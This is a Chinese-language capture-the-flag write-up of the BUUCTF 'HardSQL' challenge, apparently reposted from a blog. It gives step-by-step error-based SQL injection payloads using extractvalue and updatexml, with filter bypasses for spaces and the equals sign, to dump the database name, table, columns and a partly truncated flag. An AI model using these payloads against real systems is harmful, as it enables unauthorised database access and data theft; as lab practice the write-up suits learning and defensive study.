BUUCTF-[极客大挑战 2019]HardSQL（报错注入）

标签：ima   ike   sub   sel   sele   src   upd   select   ctf   

1、用bp fuzz后，union|order by|等号|空格|substr等被过滤，空格没有被过滤，大致有个印象
2、爆当前的数据库名：
空格绕过：用括号()包起来就行

‘or(extractvalue(1,concat(‘~‘,database())))#

用updatexml()函数是一样的：

‘or(updatexml(1,concat(‘~‘,database()),1))#

->库名：geek
3、爆表名：
等号绕过：用like替换

‘or(extractvalue(1,concat(‘~‘,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like("geek")))))#

->表名：H4rDsq1
4、爆字段名：

‘or(extractvalue(1,concat(‘~‘,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like("H4rDsq1")))))#

->字段：id,username,password
5、

‘or(extractvalue(1,concat(‘~‘,(select(password)from(H4rDsq1)))))#

flag{f5629ada-833f-4eb8-a6f2-49
没出全
这时候就要想到mysql的一些函数，substr，left，right
注意：substr被过滤了

‘or(extractvalue(1,concat(‘~‘,(select(right(password,20))from(H4rDsq1)))))#

BUUCTF-[极客大挑战 2019]HardSQL（报错注入）

标签：ima   ike   sub   sel   sele   src   upd   select   ctf   

原文地址：https://www.cnblogs.com/wrnan/p/12770280.html